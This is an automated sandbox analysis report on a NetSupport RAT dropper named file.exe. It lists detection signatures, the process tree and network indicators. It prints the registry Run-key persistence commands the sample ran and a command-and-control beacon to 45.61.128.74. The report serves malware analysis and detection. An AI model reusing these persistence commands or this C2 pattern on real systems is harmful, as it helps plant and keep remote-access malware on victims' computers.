
Windows Analysis Report
file.exe

Overview

General Information

Sample name: file.exe
Analysis ID: 1562378
MD5: a3cea314d888a08b79002656a9f4b927
SHA1: 396b9f96219785f0c80c69703dc623c23554affc
SHA256: 64356e6b4781925ef940695d869a826dc229e911919faf8729d8dfb34f31e61a
Tags: exe, user-Bitsight

Detection

NetSupport RAT
Score: 92
Range: 0 - 100
Whitelisted: false
Confidence: 100%

Signatures

Multi AV Scanner detection for dropped file
Multi AV Scanner detection for submitted file
Suricata IDS alerts for network traffic
AI detected suspicious sample
Contains functionality to change the wallpaper
Delayed program exit found
Sigma detected: Execution from Suspicious Folder
Sigma detected: New RUN Key Pointing to Suspicious Folder
Sigma detected: Suspicious Program Location with Network Connections
Uses cmd line tools excessively to alter registry or file data
Abnormal high CPU Usage
Contains functionality to read data from the clipboard
Contains functionality to check if a debugger is running (IsDebuggerPresent)
Contains functionality to check if a debugger is running (OutputDebugString,GetLastError)
Contains functionality to check if a window is minimized (may be used to check if an application is visible)
Contains functionality to communicate with device drivers
Contains functionality to dynamically determine API calls
Contains functionality to execute programs as a different user
Contains functionality to launch a process as a different user
Contains functionality to launch a program with higher privileges
Contains functionality to modify clipboard data
Contains functionality to open a port and listen for incoming connection (possibly a backdoor)
Contains functionality to query CPU information (cpuid)
Contains functionality to query locales information (e.g. system language)
Contains functionality to read the clipboard data
Contains functionality to record screenshots
Contains functionality to shutdown / reboot the system
Contains functionality to simulate keystroke presses
Contains functionality which may be used to detect a debugger (GetProcessHeap)
Creates a process in suspended mode (likely to inject code)
Detected potential crypto function
Drops PE files
Enables security privileges
Extensive use of GetProcAddress (often used to hide API calls)
File is packed with WinRar
Found a high number of Window / User specific system calls (may be a loop to detect user behavior)
Found dropped PE file which has not been started or loaded
Found evaded block containing many API calls
Found evasive API chain (date check)
Found evasive API chain checking for process token information
Found large amount of non-executed APIs
Found potential string decryption / allocating functions
HTTP GET or POST without a user agent
IP address seen in connection with other malware
Internet Provider seen in connection with other malware
May sleep (evasive loops) to hinder dynamic analysis
PE file contains sections with non-standard names
Potential key logger detected (key state polling based)
Queries sensitive Operating System Information (via WMI, Win32_ComputerSystem, often done to detect virtual machines)
Queries the volume information (name, serial number etc) of a device
Sample execution stops while process was sleeping (likely an evasion)
Sample file is different than original file name gathered from version info
Sigma detected: CurrentVersion Autorun Keys Modification
Sigma detected: Direct Autorun Keys Modification
Sigma detected: Potential Persistence Attempt Via Run Keys Using Reg.EXE
Uses Microsoft's Enhanced Cryptographic Provider
Uses code obfuscation techniques (call, push, ret)
Uses reg.exe to modify the Windows registry
Yara detected Keylogger Generic
Yara detected NetSupport remote tool

Classification

  • System is w10x64
  • file.exe (PID: 6336 cmdline: "C:\Users\user\Desktop\file.exe" MD5: A3CEA314D888A08B79002656A9F4B927)
    • cmd.exe (PID: 824 cmdline: C:\Windows\system32\cmd.exe /c ""C:\Users\Public\Netstat\netsup.bat" " MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE)
      • conhost.exe (PID: 2872 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
      • reg.exe (PID: 2992 cmdline: REG ADD "HKCU\SOFTWARE\Microsoft\Windows\CurrentVersion\Run" /V "Netstat" /t REG_SZ /F /D "C:\Users\Public\Netstat\shv.exe" MD5: 227F63E1D9008B36BDBCC4B397780BE4)
      • reg.exe (PID: 3732 cmdline: REG ADD "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Run" /V "Netstat" /t REG_SZ /F /D "C:\Users\Public\Netstat\shv.exe" MD5: 227F63E1D9008B36BDBCC4B397780BE4)
      • shv.exe (PID: 3492 cmdline: C:\Users\Public\Netstat\shv.exe MD5: 8D9709FF7D9C83BD376E01912C734F0A)
      • reg.exe (PID: 3704 cmdline: REG ADD "HKCU\SOFTWARE\Software\Supservice\Run" /V "Netstat" /t REG_SZ /F /D "C:\Users\Public\Netstat\shv.exe" MD5: 227F63E1D9008B36BDBCC4B397780BE4)
      • reg.exe (PID: 6988 cmdline: REG ADD "HKCU\SOFTWARE\Software\Supservice\Run" /V "Netstat" /t REG_SZ /F /D "C:\Users\Public\Netstat\shv.exe" MD5: 227F63E1D9008B36BDBCC4B397780BE4)
      • shv.exe (PID: 7008 cmdline: C:\Users\Public\Netstat\shv.exe MD5: 8D9709FF7D9C83BD376E01912C734F0A)
  • shv.exe (PID: 6340 cmdline: "C:\Users\Public\Netstat\shv.exe" MD5: 8D9709FF7D9C83BD376E01912C734F0A)
  • shv.exe (PID: 7008 cmdline: "C:\Users\Public\Netstat\shv.exe" MD5: 8D9709FF7D9C83BD376E01912C734F0A)
  • shv.exe (PID: 3244 cmdline: "C:\Users\Public\Netstat\shv.exe" MD5: 8D9709FF7D9C83BD376E01912C734F0A)
  • cleanup
No configs have been found
Source | Rule | Description | Author | Strings
C:\Users\Public\Netstat\shv.exe | JoeSecurity_NetSupport | Yara detected NetSupport remote tool | Joe Security |
C:\Users\Public\Netstat\pcicapi.dll | JoeSecurity_NetSupport | Yara detected NetSupport remote tool | Joe Security |
C:\Users\Public\Netstat\PCICHEK.DLL | JoeSecurity_NetSupport | Yara detected NetSupport remote tool | Joe Security |
C:\Users\Public\Netstat\TCCTL32.DLL | JoeSecurity_NetSupport | Yara detected NetSupport remote tool | Joe Security |
C:\Users\Public\Netstat\HTCTL32.DLL | JoeSecurity_NetSupport | Yara detected NetSupport remote tool | Joe Security |
(2 further entries not shown)

Source | Rule | Description | Author | Strings
00000009.00000002.1806388208.00000000111E1000.00000004.00000001.01000000.0000000A.sdmp | JoeSecurity_NetSupport | Yara detected NetSupport remote tool | Joe Security |
0000000B.00000002.1886663530.00000000111E1000.00000004.00000001.01000000.0000000A.sdmp | JoeSecurity_NetSupport | Yara detected NetSupport remote tool | Joe Security |
00000005.00000002.4131581542.0000000000F02000.00000002.00000001.01000000.00000009.sdmp | JoeSecurity_NetSupport | Yara detected NetSupport remote tool | Joe Security |
00000008.00000000.1691809237.0000000000F02000.00000002.00000001.01000000.00000009.sdmp | JoeSecurity_NetSupport | Yara detected NetSupport remote tool | Joe Security |
0000000E.00000002.1968165061.0000000000F02000.00000002.00000001.01000000.00000009.sdmp | JoeSecurity_NetSupport | Yara detected NetSupport remote tool | Joe Security |
(38 further entries not shown)

Source | Rule | Description | Author | Strings
5.2.shv.exe.f00000.0.unpack | JoeSecurity_NetSupport | Yara detected NetSupport remote tool | Joe Security |
9.2.shv.exe.f00000.0.unpack | JoeSecurity_NetSupport | Yara detected NetSupport remote tool | Joe Security |
9.0.shv.exe.f00000.0.unpack | JoeSecurity_NetSupport | Yara detected NetSupport remote tool | Joe Security |
11.2.shv.exe.f00000.0.unpack | JoeSecurity_NetSupport | Yara detected NetSupport remote tool | Joe Security |
8.2.shv.exe.73af0000.5.unpack | JoeSecurity_NetSupport | Yara detected NetSupport remote tool | Joe Security |
(38 further entries not shown)

System Summary

Source: Process started | Author: Florian Roth (Nextron Systems), Tim Shelton | Data: Command: C:\Users\Public\Netstat\shv.exe, CommandLine: C:\Users\Public\Netstat\shv.exe, CommandLine|base64offset|contains: , Image: C:\Users\Public\Netstat\shv.exe, NewProcessName: C:\Users\Public\Netstat\shv.exe, OriginalFileName: C:\Users\Public\Netstat\shv.exe, ParentCommandLine: C:\Windows\system32\cmd.exe /c ""C:\Users\Public\Netstat\netsup.bat" ", ParentImage: C:\Windows\System32\cmd.exe, ParentProcessId: 824, ParentProcessName: cmd.exe, ProcessCommandLine: C:\Users\Public\Netstat\shv.exe, ProcessId: 3492, ProcessName: shv.exe
Source: Registry Key set | Author: Florian Roth (Nextron Systems), Markus Neis, Sander Wiebing | Data: Details: C:\Users\Public\Netstat\shv.exe, EventID: 13, EventType: SetValue, Image: C:\Windows\System32\reg.exe, ProcessId: 2992, TargetObject: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\Netstat
Source: Network Connection | Author: Florian Roth (Nextron Systems), Tim Shelton | Data: DestinationIp: 45.61.128.74, DestinationIsIpv6: false, DestinationPort: 443, EventID: 3, Image: C:\Users\Public\Netstat\shv.exe, Initiated: true, ProcessId: 3492, Protocol: tcp, SourceIp: 192.168.2.4, SourceIsIpv6: false, SourcePort: 49730
Source: Registry Key set | Author: Victor Sergeev, Daniil Yugoslavskiy, Gleb Sukhodolskiy, Timur Zinniatullin, oscd.community, Tim Shelton, frack113 (split) | Data: Details: C:\Users\Public\Netstat\shv.exe, EventID: 13, EventType: SetValue, Image: C:\Windows\System32\reg.exe, ProcessId: 2992, TargetObject: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\Netstat
Source: Process started | Author: Victor Sergeev, Daniil Yugoslavskiy, oscd.community | Data: Command: REG ADD "HKCU\SOFTWARE\Microsoft\Windows\CurrentVersion\Run" /V "Netstat" /t REG_SZ /F /D "C:\Users\Public\Netstat\shv.exe", CommandLine: REG ADD "HKCU\SOFTWARE\Microsoft\Windows\CurrentVersion\Run" /V "Netstat" /t REG_SZ /F /D "C:\Users\Public\Netstat\shv.exe", CommandLine|base64offset|contains: DA, Image: C:\Windows\System32\reg.exe, NewProcessName: C:\Windows\System32\reg.exe, OriginalFileName: C:\Windows\System32\reg.exe, ParentCommandLine: C:\Windows\system32\cmd.exe /c ""C:\Users\Public\Netstat\netsup.bat" ", ParentImage: C:\Windows\System32\cmd.exe, ParentProcessId: 824, ParentProcessName: cmd.exe, ProcessCommandLine: REG ADD "HKCU\SOFTWARE\Microsoft\Windows\CurrentVersion\Run" /V "Netstat" /t REG_SZ /F /D "C:\Users\Public\Netstat\shv.exe", ProcessId: 2992, ProcessName: reg.exe
Source: Process started | Author: Florian Roth (Nextron Systems) | Data: Command: REG ADD "HKCU\SOFTWARE\Microsoft\Windows\CurrentVersion\Run" /V "Netstat" /t REG_SZ /F /D "C:\Users\Public\Netstat\shv.exe", CommandLine: REG ADD "HKCU\SOFTWARE\Microsoft\Windows\CurrentVersion\Run" /V "Netstat" /t REG_SZ /F /D "C:\Users\Public\Netstat\shv.exe", CommandLine|base64offset|contains: DA, Image: C:\Windows\System32\reg.exe, NewProcessName: C:\Windows\System32\reg.exe, OriginalFileName: C:\Windows\System32\reg.exe, ParentCommandLine: C:\Windows\system32\cmd.exe /c ""C:\Users\Public\Netstat\netsup.bat" ", ParentImage: C:\Windows\System32\cmd.exe, ParentProcessId: 824, ParentProcessName: cmd.exe, ProcessCommandLine: REG ADD "HKCU\SOFTWARE\Microsoft\Windows\CurrentVersion\Run" /V "Netstat" /t REG_SZ /F /D "C:\Users\Public\Netstat\shv.exe", ProcessId: 2992, ProcessName: reg.exe

Timestamp | SID | Severity | Classtype | Source IP | Source Port | Destination IP | Destination Port | Protocol
2024-11-25T14:58:03.946249+0100 | 2827745 | 1 | Malware Command and Control Activity Detected | 192.168.2.4 | 49730 | 45.61.128.74 | 443 | TCP

AV Detection

Source: C:\Users\Public\Netstat\remcmdstub.exe | ReversingLabs: Detection: 13%
Source: C:\Users\Public\Netstat\shv.exe | ReversingLabs: Detection: 28%
Source: file.exe | ReversingLabs: Detection: 39%
Source: Submitted Sample | Integrated Neural Analysis Model: Matched 92.4% probability
Source: C:\Users\Public\Netstat\shv.exe | Code function: 5_2_110AD570 GetModuleHandleA,GetProcAddress,GetProcAddress,GetLastError,wsprintfA,GetLastError,_memset,CryptGetProvParam,CryptGetProvParam,GetLastError,_memset,CryptGetProvParam,GetLastError,GetLastError,GetLastError,GetLastError,_malloc,GetLastError,_free,GetLastError,CryptReleaseContext,SetLastError,FreeLibrary,5_2_110AD570
Source: C:\Users\Public\Netstat\shv.exe | Code function: 8_2_110AD570 GetModuleHandleA,GetProcAddress,GetProcAddress,GetLastError,wsprintfA,GetLastError,_memset,CryptGetProvParam,CryptGetProvParam,GetLastError,_memset,CryptGetProvParam,GetLastError,GetLastError,GetLastError,GetLastError,_malloc,GetLastError,_free,GetLastError,CryptReleaseContext,SetLastError,FreeLibrary,8_2_110AD570
Source: C:\Users\user\Desktop\file.exe | File opened: C:\Users\Public\Netstat\msvcr100.dll
Source: file.exe | Static PE information: HIGH_ENTROPY_VA, DYNAMIC_BASE, NX_COMPAT, GUARD_CF, TERMINAL_SERVER_AWARE
Source: Binary string: msvcr100.i386.pdb source: shv.exe, shv.exe, 00000005.00000002.4133157062.000000006CF61000.00000020.00000001.01000000.0000000C.sdmp, shv.exe, 00000008.00000002.1694833283.000000006CF61000.00000020.00000001.01000000.0000000C.sdmp, shv.exe, 00000009.00000002.1806765097.000000006CF61000.00000020.00000001.01000000.0000000C.sdmp, shv.exe, 0000000B.00000002.1887019832.000000006CF61000.00000020.00000001.01000000.0000000C.sdmp, shv.exe, 0000000E.00000002.1968818486.000000006CF61000.00000020.00000001.01000000.0000000C.sdmp, msvcr100.dll.0.dr
Source: Binary string: E:\nsmsrc\nsm\1210\1210\ctl32\Full\pcichek.pdb source: shv.exe, 00000005.00000002.4133414083.0000000073AF2000.00000002.00000001.01000000.0000000B.sdmp, shv.exe, 00000008.00000002.1695153610.0000000073AF2000.00000002.00000001.01000000.0000000B.sdmp, shv.exe, 00000009.00000002.1807037873.0000000073AF2000.00000002.00000001.01000000.0000000B.sdmp, shv.exe, 0000000B.00000002.1887260588.0000000073AF2000.00000002.00000001.01000000.0000000B.sdmp, shv.exe, 0000000E.00000002.1969045817.0000000073AF2000.00000002.00000001.01000000.0000000B.sdmp, PCICHEK.DLL.0.dr
Source: Binary string: E:\nsmsrc\nsm\1210\1210f\client32\Release\PCICL32.pdb source: file.exe, 00000000.00000003.1673741447.000001AFA55A0000.00000004.00000020.00020000.00000000.sdmp, shv.exe, 00000005.00000002.4132635171.0000000011193000.00000002.00000001.01000000.0000000A.sdmp, shv.exe, 00000008.00000002.1694399599.0000000011193000.00000002.00000001.01000000.0000000A.sdmp, shv.exe, 00000009.00000002.1806208659.0000000011193000.00000002.00000001.01000000.0000000A.sdmp, shv.exe, 0000000B.00000002.1886628907.0000000011193000.00000002.00000001.01000000.0000000A.sdmp, shv.exe, 0000000E.00000002.1968430156.0000000011193000.00000002.00000001.01000000.0000000A.sdmp, PCICL32.DLL.0.dr
Source: Binary string: E:\nsmsrc\nsm\1210\1210\ctl32\Full\pcichek.pdbN source: PCICHEK.DLL.0.dr
Source: Binary string: E:\nsmsrc\nsm\1210\1210f\ctl32\release\htctl32.pdbL source: file.exe, 00000000.00000003.1673741447.000001AFA55A0000.00000004.00000020.00020000.00000000.sdmp, shv.exe, 00000005.00000002.4133041129.000000006CDB0000.00000002.00000001.01000000.0000000E.sdmp, HTCTL32.DLL.0.dr
Source: Binary string: E:\nsmsrc\nsm\1210\1210\client32\Release\client32.pdb source: shv.exe, 00000005.00000002.4131581542.0000000000F02000.00000002.00000001.01000000.00000009.sdmp, shv.exe, 00000005.00000000.1680595805.0000000000F02000.00000002.00000001.01000000.00000009.sdmp, shv.exe, 00000008.00000000.1691809237.0000000000F02000.00000002.00000001.01000000.00000009.sdmp, shv.exe, 00000008.00000002.1694138825.0000000000F02000.00000002.00000001.01000000.00000009.sdmp, shv.exe, 00000009.00000002.1805359841.0000000000F02000.00000002.00000001.01000000.00000009.sdmp, shv.exe, 00000009.00000000.1802595368.0000000000F02000.00000002.00000001.01000000.00000009.sdmp, shv.exe, 0000000B.00000000.1884540195.0000000000F02000.00000002.00000001.01000000.00000009.sdmp, shv.exe, 0000000B.00000002.1886119575.0000000000F02000.00000002.00000001.01000000.00000009.sdmp, shv.exe, 0000000E.00000002.1968165061.0000000000F02000.00000002.00000001.01000000.00000009.sdmp, shv.exe, 0000000E.00000000.1965850134.0000000000F02000.00000002.00000001.01000000.00000009.sdmp, shv.exe.0.dr
Source: Binary string: E:\nsmsrc\nsm\1210\1210f\ctl32\release\tcctl32.pdb source: file.exe, 00000000.00000003.1673741447.000001AFA55A0000.00000004.00000020.00020000.00000000.sdmp, TCCTL32.DLL.0.dr
Source: Binary string: E:\nsmsrc\nsm\1210\1210f\ctl32\release\htctl32.pdb source: file.exe, 00000000.00000003.1673741447.000001AFA55A0000.00000004.00000020.00020000.00000000.sdmp, shv.exe, 00000005.00000002.4133041129.000000006CDB0000.00000002.00000001.01000000.0000000E.sdmp, HTCTL32.DLL.0.dr
Source: Binary string: E:\nsmsrc\nsm\1210\1210f\ctl32\release\tcctl32.pdbP source: file.exe, 00000000.00000003.1673741447.000001AFA55A0000.00000004.00000020.00020000.00000000.sdmp, TCCTL32.DLL.0.dr
Source: Binary string: D:\Projects\WinRAR\sfx\build\sfxrar64\Release\sfxrar.pdb source: file.exe
Source: Binary string: E:\nsmsrc\nsm\1210\1210\ctl32\Release\pcicapi.pdb source: shv.exe, 00000005.00000002.4133318649.000000006E545000.00000002.00000001.01000000.0000000D.sdmp, shv.exe, 00000008.00000002.1695028330.000000006E545000.00000002.00000001.01000000.0000000D.sdmp, shv.exe, 00000009.00000002.1806911181.000000006E545000.00000002.00000001.01000000.0000000D.sdmp, shv.exe, 0000000B.00000002.1887171743.000000006E545000.00000002.00000001.01000000.0000000D.sdmp, shv.exe, 0000000E.00000002.1968966209.000000006E545000.00000002.00000001.01000000.0000000D.sdmp, pcicapi.dll.0.dr
Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_00007FF6FE1940BC FindFirstFileW,FindFirstFileW,GetLastError,FindNextFileW,GetLastError,_invalid_parameter_noinfo_noreturn,_invalid_parameter_noinfo_noreturn,0_2_00007FF6FE1940BC
Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_00007FF6FE1AB190 EndDialog,SetDlgItemTextW,GetMessageW,IsDialogMessageW,TranslateMessage,DispatchMessageW,EndDialog,GetDlgItem,SendMessageW,SendMessageW,SetFocus,GetLastError,GetLastError,GetTickCount,GetLastError,GetCommandLineW,CreateFileMappingW,MapViewOfFile,ShellExecuteExW,Sleep,UnmapViewOfFile,CloseHandle,SetDlgItemTextW,SetWindowTextW,SetDlgItemTextW,SetWindowTextW,GetDlgItem,GetWindowLongPtrW,SetWindowLongPtrW,SetDlgItemTextW,SendMessageW,SendDlgItemMessageW,GetDlgItem,SendMessageW,GetDlgItem,SetDlgItemTextW,SetDlgItemTextW,DialogBoxParamW,EndDialog,EnableWindow,SendMessageW,SetDlgItemTextW,_invalid_parameter_noinfo_noreturn,_invalid_parameter_noinfo_noreturn,_invalid_parameter_noinfo_noreturn,_invalid_parameter_noinfo_noreturn,_invalid_parameter_noinfo_noreturn,_invalid_parameter_noinfo_noreturn,SendDlgItemMessageW,EndDialog,GetDlgItem,SetFocus,SendDlgItemMessageW,FindFirstFileW,FindClose,SendDlgItemMessageW,_invalid_parameter_noinfo_noreturn,_invalid_parameter_noinfo_noreturn,_invalid_parameter_noinfo_noreturn,_invalid_parameter_noinfo_noreturn,_invalid_parameter_noinfo_noreturn,_invalid_parameter_noinfo_noreturn,0_2_00007FF6FE1AB190
Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_00007FF6FE1BFCA0 FindFirstFileExA,0_2_00007FF6FE1BFCA0
Source: C:\Users\Public\Netstat\shv.exe | Code function: 5_2_1102D330 InterlockedIncrement,Sleep,Sleep,GetCurrentProcess,SetPriorityClass,SetEvent,Sleep,PostThreadMessageA,PostThreadMessageA,CloseHandle,_free,_free,GetModuleFileNameA,GetFileAttributesA,_memset,FindFirstFileA,FindNextFileA,FindNextFileA,FindClose,ExitWindowsEx,ExitWindowsEx,Sleep,ExitWindowsEx,Sleep,ExitProcess,5_2_1102D330
Source: C:\Users\Public\Netstat\shv.exe | Code function: 5_2_11065890 _memset,_memmove,_strncpy,CharUpperA,FindFirstFileA,FindNextFileA,FindClose,wsprintfA,5_2_11065890
Source: C:\Users\Public\Netstat\shv.exe | Code function: 5_2_1106A0A0 GetTickCount,OpenPrinterA,StartDocPrinterA,ClosePrinter,FindFirstFileA,FindClose,CreateFileA,SetFilePointer,GetTickCount,GetLastError,5_2_1106A0A0
Source: C:\Users\Public\Netstat\shv.exe | Code function: 5_2_111266E0 _memset,_memset,GetVersionExA,GetTempPathA,GetModuleFileNameA,_strrchr,CreateFileA,CreateFileA,WriteFile,CloseHandle,CloseHandle,CreateFileA,GetCurrentProcessId,wsprintfA,CreateProcessA,CloseHandle,CloseHandle,CloseHandle,CreateProcessA,DeleteFileA,Sleep,WaitForSingleObject,CloseHandle,GetCurrentProcess,RemoveDirectoryA,GetLastError,ExitProcess,FindNextFileA,FindClose,FindFirstFileA,GetCurrentProcess,GetCurrentProcess,DuplicateHandle,GetModuleFileNameA,_strrchr,_memmove,GetThreadContext,VirtualProtectEx,WriteProcessMemory,FlushInstructionCache,SetThreadContext,ResumeThread,CloseHandle,CloseHandle,5_2_111266E0
Source: C:\Users\Public\Netstat\shv.exe | Code function: 8_2_1102D330 InterlockedIncrement,Sleep,Sleep,GetCurrentProcess,SetPriorityClass,SetEvent,Sleep,PostThreadMessageA,PostThreadMessageA,CloseHandle,_free,_free,GetModuleFileNameA,GetFileAttributesA,_memset,FindFirstFileA,FindNextFileA,FindNextFileA,FindClose,ExitWindowsEx,ExitWindowsEx,Sleep,ExitWindowsEx,Sleep,ExitProcess,8_2_1102D330
Source: C:\Users\Public\Netstat\shv.exe | Code function: 8_2_11065890 _memset,_memmove,_strncpy,CharUpperA,FindFirstFileA,FindNextFileA,FindClose,wsprintfA,8_2_11065890
Source: C:\Users\Public\Netstat\shv.exe | Code function: 8_2_1106A0A0 GetTickCount,OpenPrinterA,StartDocPrinterA,ClosePrinter,FindFirstFileA,FindClose,CreateFileA,SetFilePointer,GetTickCount,GetLastError,8_2_1106A0A0
Source: C:\Users\Public\Netstat\shv.exe | Code function: 8_2_111266E0 _memset,_memset,GetVersionExA,GetTempPathA,GetModuleFileNameA,_strrchr,CreateFileA,CreateFileA,WriteFile,CloseHandle,CloseHandle,CreateFileA,GetCurrentProcessId,wsprintfA,CreateProcessA,CloseHandle,CloseHandle,CloseHandle,CreateProcessA,DeleteFileA,Sleep,WaitForSingleObject,CloseHandle,GetCurrentProcess,RemoveDirectoryA,GetLastError,ExitProcess,FindNextFileA,FindClose,FindFirstFileA,GetCurrentProcess,GetCurrentProcess,DuplicateHandle,GetModuleFileNameA,_strrchr,_memmove,GetThreadContext,VirtualProtectEx,WriteProcessMemory,FlushInstructionCache,SetThreadContext,ResumeThread,CloseHandle,CloseHandle,8_2_111266E0
Source: C:\Users\Public\Netstat\shv.exe | Code function: 8_2_1110AFD0 _memset,wsprintfA,wsprintfA,KillTimer,FindFirstFileA,wsprintfA,FindNextFileA,GetLastError,FindClose,8_2_1110AFD0

Networking

Source: Network traffic | Suricata IDS: 2827745 - Severity 1 - ETPRO MALWARE NetSupport RAT CnC Activity : 192.168.2.4:49730 -> 45.61.128.74:443
Source: global traffic | HTTP traffic detected: GET /location/loca.asp HTTP/1.1 | Host: geo.netsupportsoftware.com | Connection: Keep-Alive | Cache-Control: no-cache
Source: Joe Sandbox View | IP Address: 104.26.1.231
Source: Joe Sandbox View | ASN Name: M247GB
Source: unknown | TCP traffic detected without corresponding DNS query: 45.61.128.74
Source: unknown | TCP traffic detected without corresponding DNS query: 45.61.128.74
Source: unknown | TCP traffic detected without corresponding DNS query: 45.61.128.74
Source: unknown | UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: global traffic | HTTP traffic detected: GET /location/loca.asp HTTP/1.1 | Host: geo.netsupportsoftware.com | Connection: Keep-Alive | Cache-Control: no-cache
Source: global traffic | DNS traffic detected: DNS query: geo.netsupportsoftware.com
Source: unknown | HTTP traffic detected: POST http://45.61.128.74/fakeurl.htm HTTP/1.1 | User-Agent: NetSupport Manager/1.3 | Content-Type: application/x-www-form-urlencoded | Content-Length: 22 | Host: 45.61.128.74 | Connection: Keep-Alive | Body: CMD=POLL INFO=1 ACK=1 | Data Raw: | Data Ascii:
Source: file.exe, 00000000.00000003.1673741447.000001AFA55A0000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.1675691550.000001AFA17C4000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.1675726387.000001AFA17C4000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.1674859649.000001AFA17C2000.00000004.00000020.00020000.00000000.sdmp, shv.exe, shv.exe, 00000005.00000002.4133041129.000000006CDB0000.00000002.00000001.01000000.0000000E.sdmp, HTCTL32.DLL.0.dr | String found in binary or memory: http://%s/fakeurl.htm
Source: file.exe, 00000000.00000003.1673741447.000001AFA55A0000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.1675691550.000001AFA17C4000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.1675726387.000001AFA17C4000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.1674859649.000001AFA17C2000.00000004.00000020.00020000.00000000.sdmp, shv.exe, shv.exe, 00000005.00000002.4133041129.000000006CDB0000.00000002.00000001.01000000.0000000E.sdmp, HTCTL32.DLL.0.dr | String found in binary or memory: http://%s/testpage.htm
Source: file.exe, 00000000.00000003.1673741447.000001AFA55A0000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.1675691550.000001AFA17C4000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.1675726387.000001AFA17C4000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.1674859649.000001AFA17C2000.00000004.00000020.00020000.00000000.sdmp, shv.exe, 00000005.00000002.4133041129.000000006CDB0000.00000002.00000001.01000000.0000000E.sdmp, HTCTL32.DLL.0.dr | String found in binary or memory: http://%s/testpage.htmwininet.dll
Source: shv.exe, shv.exe, 00000008.00000002.1694399599.0000000011193000.00000002.00000001.01000000.0000000A.sdmp, shv.exe, 00000009.00000002.1806208659.0000000011193000.00000002.00000001.01000000.0000000A.sdmp, shv.exe, 0000000B.00000002.1886628907.0000000011193000.00000002.00000001.01000000.0000000A.sdmp, shv.exe, 0000000E.00000002.1968430156.0000000011193000.00000002.00000001.01000000.0000000A.sdmp, PCICL32.DLL.0.dr | String found in binary or memory: http://127.0.0.1
Source: file.exe, 00000000.00000003.1673741447.000001AFA55A0000.00000004.00000020.00020000.00000000.sdmp, shv.exe, 00000005.00000002.4132635171.0000000011193000.00000002.00000001.01000000.0000000A.sdmp, shv.exe, 00000008.00000002.1694399599.0000000011193000.00000002.00000001.01000000.0000000A.sdmp, shv.exe, 00000009.00000002.1806208659.0000000011193000.00000002.00000001.01000000.0000000A.sdmp, shv.exe, 0000000B.00000002.1886628907.0000000011193000.00000002.00000001.01000000.0000000A.sdmp, shv.exe, 0000000E.00000002.1968430156.0000000011193000.00000002.00000001.01000000.0000000A.sdmp, PCICL32.DLL.0.dr | String found in binary or memory: http://127.0.0.1RESUMEPRINTING
Source: remcmdstub.exe.0.dr | String found in binary or memory: http://crl.globalsign.com/ca/gstsacasha384g4.crl0
Source: remcmdstub.exe.0.dr | String found in binary or memory: http://crl.globalsign.com/codesigningrootr45.crl0U
Source: remcmdstub.exe.0.dr | String found in binary or memory: http://crl.globalsign.com/gsgccr45evcodesignca2020.crl0$
Source: remcmdstub.exe.0.dr | String found in binary or memory: http://crl.globalsign.com/root-r3.crl0G
Source: remcmdstub.exe.0.dr | String found in binary or memory: http://crl.globalsign.com/root-r6.crl0G
Source: shv.exe, 00000005.00000002.4131206311.0000000000B90000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: http://geo.netsupportsoftware.com/Echo
Source: shv.exe, shv.exe, 00000008.00000002.1694399599.0000000011193000.00000002.00000001.01000000.0000000A.sdmp, shv.exe, 00000009.00000002.1806208659.0000000011193000.00000002.00000001.01000000.0000000A.sdmp, shv.exe, 0000000B.00000002.1886628907.0000000011193000.00000002.00000001.01000000.0000000A.sdmp, shv.exe, 0000000E.00000002.1968430156.0000000011193000.00000002.00000001.01000000.0000000A.sdmp, PCICL32.DLL.0.dr | String found in binary or memory: http://geo.netsupportsoftware.com/location/loca.asp
Source: shv.exe, 00000005.00000002.4131206311.0000000000B9F000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: http://geo.netsupportsoftware.com/location/loca.asp$
Source: shv.exe, 00000005.00000002.4131206311.0000000000B90000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: http://geo.netsupportsoftware.com/location/loca.asp0
Source: file.exe, 00000000.00000003.1673741447.000001AFA55A0000.00000004.00000020.00020000.00000000.sdmp, shv.exe, 00000005.00000002.4132635171.0000000011193000.00000002.00000001.01000000.0000000A.sdmp, shv.exe, 00000008.00000002.1694399599.0000000011193000.00000002.00000001.01000000.0000000A.sdmp, shv.exe, 00000009.00000002.1806208659.0000000011193000.00000002.00000001.01000000.0000000A.sdmp, shv.exe, 0000000B.00000002.1886628907.0000000011193000.00000002.00000001.01000000.0000000A.sdmp, shv.exe, 0000000E.00000002.1968430156.0000000011193000.00000002.00000001.01000000.0000000A.sdmp, PCICL32.DLL.0.dr | String found in binary or memory: http://geo.netsupportsoftware.com/location/loca.aspSetChannel(%s)
Source: remcmdstub.exe.0.dr | String found in binary or memory: http://ocsp.globalsign.com/ca/gstsacasha384g40C
Source: remcmdstub.exe.0.dr | String found in binary or memory: http://ocsp.globalsign.com/codesigningrootr450F
Source: remcmdstub.exe.0.dr | String found in binary or memory: http://ocsp.globalsign.com/gsgccr45evcodesignca20200U
Source: remcmdstub.exe.0.dr | String found in binary or memory: http://ocsp.globalsign.com/rootr30;
Source: remcmdstub.exe.0.dr | String found in binary or memory: http://ocsp2.globalsign.com/rootr606
